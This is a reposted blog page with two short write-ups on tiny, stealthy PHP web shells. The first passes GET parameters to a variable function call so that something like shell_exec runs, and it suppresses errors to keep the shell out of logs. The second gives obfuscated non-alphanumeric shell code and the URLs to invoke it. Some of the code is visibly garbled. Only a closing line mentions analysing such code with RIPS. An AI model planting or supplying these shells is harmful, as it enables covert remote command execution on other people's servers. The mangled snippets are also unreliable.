# small php shell（2篇）

/ 0评 / 0

========================

Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven’t been all too stealth!

This is really pointless, but someone might be interested in it.
So here you go folks!

It doesn’t look like much so let me explain.

PHP allows strings to be interpreted as function calls.
That’s a major part on how callbacks in PHP work.

Example:

    <?

$array = array(1,2,3); array_walk($array, ’f’);

function f($x){echo$x * 2;}

?>

What the following example does, is that array_walk() iterates through the array $array and applies the function f() on each and every element in the list. The function f() prints out the value from the array and multiplies it by two. The output results in: 246. The fun thing is, if you look on how the callback f() is applied - it’s by a simple string. (Look at argument #2 in the first function; array_walk()). What does that mean? Well, to put it short, you’re able to take a string - and execute it as a function name. Now, let’s try something... fuzzier...  <?$fuzz = ’phpinfo’;

$fuzz(); ?> What might this do? Will it execute? Damn right. Now let’s tear my tiny code apart. It’s made out of two parts.   The first part takes the value from the GET-variable 2 and stores it in the temporary variable$_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as it’s one-and-only argument. The @’s are only there for suppressing notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them. Conclusion: Copy and paste the snippet, and store it in a PHP-file. Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami The response should be something like: apache ...or as on Windows if you’re running your server as a service: nt authority/system. Conclusion; PHP is fun! Ciao! //////////////////////////////////////////////////////////////////////////////////////////////////////////////// 二篇： So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: 107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this: $_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);$__=+"";
$__++;$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107$___="$___"; But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped. Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell. Onto the second technique, PHP allows you to use bitwise operators on strings ’a’|’b’;//c! We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell <pre class="brush:php; toolbar: true; auto-links: true;"><?$_=""; $_[+""]=’’;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?=${’_’.$_}[’_’](${’_’.\$_}[’__’]);?></pre><br /> 

The first part converts a string into an array by attempting to
assign to “0″ position of the string. Then I make sure the array is a
string. Then I use “A” from array with bitwise operators to construct
“G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″.
There you have it,you could even generate non-alpha code without using
GET quite easily by producing different characters until you get an eval
method.

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.

• 默认
• 护眼
• 夜晚
• Serif
• Sans